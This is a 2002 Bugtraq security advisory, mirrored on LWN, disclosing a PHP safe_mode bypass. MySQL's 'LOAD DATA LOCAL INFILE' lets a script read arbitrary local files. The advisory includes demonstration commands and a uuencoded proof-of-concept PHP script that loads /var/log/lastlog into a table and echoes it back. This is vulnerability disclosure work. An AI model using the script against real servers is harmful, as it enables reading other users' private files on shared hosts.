![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: Dave Wilson <dw@dahomelands.net>
To: NTBugTraq Mailling List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
"SecurityFocus' BugTraq" <bugtraq@securityfocus.com>
Subject: PHP Safe Mode Filesystem Circumvention Problem
Date: Sun, 3 Feb 2002 22:21:44 +0000
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
------------------------------------------------------------------------------
Security Advisory DW020203-PHP
Release: 3rd February 2002
PHP Safe Mode Filesystem Circumvention Problem
Severity: Medium to high.
Affects: PHP, all versions which include safe_mode feature.
Platform: UNIX, Microsoft Windows, any platforms on which PHP is available.
Vendor: http://php.net.
Discovered: 12th January 2002, Dave Wilson <dw@dahomelands.net>, using
PHP 4.1.0 & Apache 2 on Linux.
------------------------------------------------------------------------------
VULNERABILITY IN BRIEF
PHP (since version 3?) includes a commonly used feature known as Safe Mode.
When enabled, scripts are highly limited in their ability to access or
execute local files, among other things.
PHP relies on a wrapper function around all filesystem calls to perform
access checks, but unforunately the bundled MySQL client library has not
been modified to perform such checks on "LOAD DATA INFILE LOCAL" statements.
If an attacker has access to a MySQL server (either provided by you or
himself), he can use it as a proxy by which to download files residing on
the safe_mode-enabled web server. For large ISPs relying on this feature
for individual customer privacy, it could mean clients accessing each
other's files, or viewing of files on an improperly secured server.
FIX
Currently, no fix exists. You may use other PHP safe_mode functions to
disable the use of the MySQL client library, or secure your servers in a
proper fashion.. A suggested fix for the PHP developers might be to scan
mysql_query()s for strings similar to "LOAD DATA LOCAL INFILE".
Happy hackers out there might like to look at libmysql.c:1764 if interested
in fixing this problem, although that may only be possible from within PHP.
EXAMPLE
The attached script will (once configured correctly) attempt to read
"/var/log/lastlog" via the SQL daemon and return it to the client.
$ cp safe_mode.php /www
$ wget -qO lastlog_via_mysql localhost/safe_mode.php
$ diff /var/log/lastlog lastlog_via_mysql; echo $?
0
COMMENTS
Due to the nature of the PHP project, development is very rapid and hence
many sites do not keep up with latest PHP versions. If a fix was available,
it would take quite a while to propagate.
It is likely that this is not an isolated problem in PHP, my bets are on
PostgreSQL and other PHP database extensions missing this one too.
The MySQL support has been enabled in PHP by default for as long as I can
remember.
DAVE WILSON
Currently residing in Belfast, Northern Ireland, he is available for work
relating to network security auditing, post-attack recovery and forensics,
and penetration testing. He may be contacted at <dw@dahomelands.net>. If
you have any comments regarding this advisory, please contact him directly.
Sun Feb 3 21:23:03 GMT 2002 -dw
begin 644 safe_mode.php
M/#\*"B\J"B`@(%!(4"!3869E($UO9&4@4')O8FQE;0H*("`@5&AI<R!S8W)I
M<'0@=VEL;"!C;VYN96-T('1O(&$@9&%T86)A<V4@<V5R=F5R(')U;FYI;F<@
M;&]C86QL>2!O<B!O=&AE<G=I<V4L"B`@(&-R96%T92!A('1E;7!O<F%R>2!T
M86)L92!W:71H(&]N92!C;VQU;6XL('5S92!T:&4@3$]!1"!$051!('-T871E
M;65N="!T;PH@("!R96%D(&$@*'!O<W-I8FQY(&)I;F%R>2D@9FEL92P@=&AE
M;B!R96%D<R!I="!B86-K('1O('1H92!C;&EE;G0N"@H@("!!;GD@='EP92!O
M9B!F:6QE(&UA>2!P87-S('1H<F]U9V@@=&AI<R`G<')O>'DG+B!!;'1H;W5G
M:"!U;G)E;&%T960L('1H:7,*("`@;6%Y(&%L<V\@8F4@=7-E9"!T;R!A8V-E
M<W,@9FEL97,@;VX@=&AE($1"('-E<G9E<B`H86QT:&]U9V@@=&AE>2!M=7-T
M(&)E"B`@('=O<FQD+7)E861A8FQE(&]R(&EN($UY4U%,9"=S(&)A<V5D:7(L
M(&%C8V]R9&EN9R!T;R!D;V-S*2X**B\*"@HD:&]S="`]("=L;V-A;&AO<W0G
M.PHD=7-E<B`]("=R;V]T)SL*)'!A<W,@/2`G;&5T;65I;B<["B1D8B`@(#T@
M)W1E<W1?9&%T86)A<V4G.PH*)&9I;&5N86UE(#T@)R]V87(O;&]G+VQA<W1L
M;V<G.R`@("`@+RH@1FEL92!T;R!G<F%B(&9R;VT@6VQO8V%L72!S97)V97(@
M*B\*)&QO8V%L(#T@=')U93L@("`@("`@("`@("`@("`@("`@("`@+RH@4F5A
M9"!F<F]M(&QO8V%L(&9I;&5S>7-T96T@*B\*"@HD;&]C86P@/2`D;&]C86P@
M/R`G3$]#04PG(#H@)R<["@HD<W%L(#T@87)R87D@*`H@("`B55-%("1D8B(L
M"@H@("`G0U)%051%(%1%35!/4D%262!404),12`G("X@*"1T8FP@/2`G02<N
M=&EM92`H*2D@+B`G("AA($Q/3D="3$]"*2<L"@H@("`B3$]!1"!$051!("1L
M;V-A;"!)3D9)3$4@)R1F:6QE;F%M92<@24Y43R!404),12`D=&)L($9)14Q$
M4R`B"B`@("X@(E1%4DU)3D%4140@0ED@("`@("`@)U]?5$A)4U].159%4E](
M05!014Y37U\G("(*("`@+B`B15-#05!%1"!"62`@("`@("`@("`G)R`B"B`@
M("X@(DQ)3D53(%1%4DU)3D%4140@0ED@)U]?5$A)4U].159%4E](05!014Y3
M7U\G(BP*"B`@(")314Q%0U0@82!&4D]-("1T8FP@3$E-250@,2(**3L*"DAE
M861E<B`H)T-O;G1E;G0M='EP93H@=&5X="]P;&%I;B<I.PH*;7ES<6Q?8V]N
M;F5C="`H)&AO<W0L("1U<V5R+"`D<&%S<RD["@IF;W)E86-H("@D<W%L(&%S
M("1S=&%T96UE;G0I('L*("`@)'$@/2!M>7-Q;%]Q=65R>2`H)'-T871E;65N
M="D["@H@("!I9B`H)'$@/3T@9F%L<V4I(&1I92`H"B`@("`@(")&04E,140Z
M("(@+B`D<W1A=&5M96YT("X@(EQN(B`N"B`@("`@(")214%33TXZ("(@+B!M
M>7-Q;%]E<G)O<B`H*2`N(")<;B(*("`@*3L*"B`@(&EF("@A("1R(#T@0&UY
M<W%L7V9E=&-H7V%R<F%Y("@D<2P@35E344Q?3E5-*2D@8V]N=&EN=64["@H@
L("!E8VAO("1R(%LP73L*("`@;7ES<6Q?9G)E95]R97-U;'0@*"1Q*3L*?0H`
`
end
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAjxds+sACgkQs0ye6vw1XQFp4ACgktwtq2IXVxhY1gXOSfmnRpa5
MBMAnjqqAm/KKS0A4EzaRTa7fpdCAbk7
=DP/f
-----END PGP SIGNATURE-----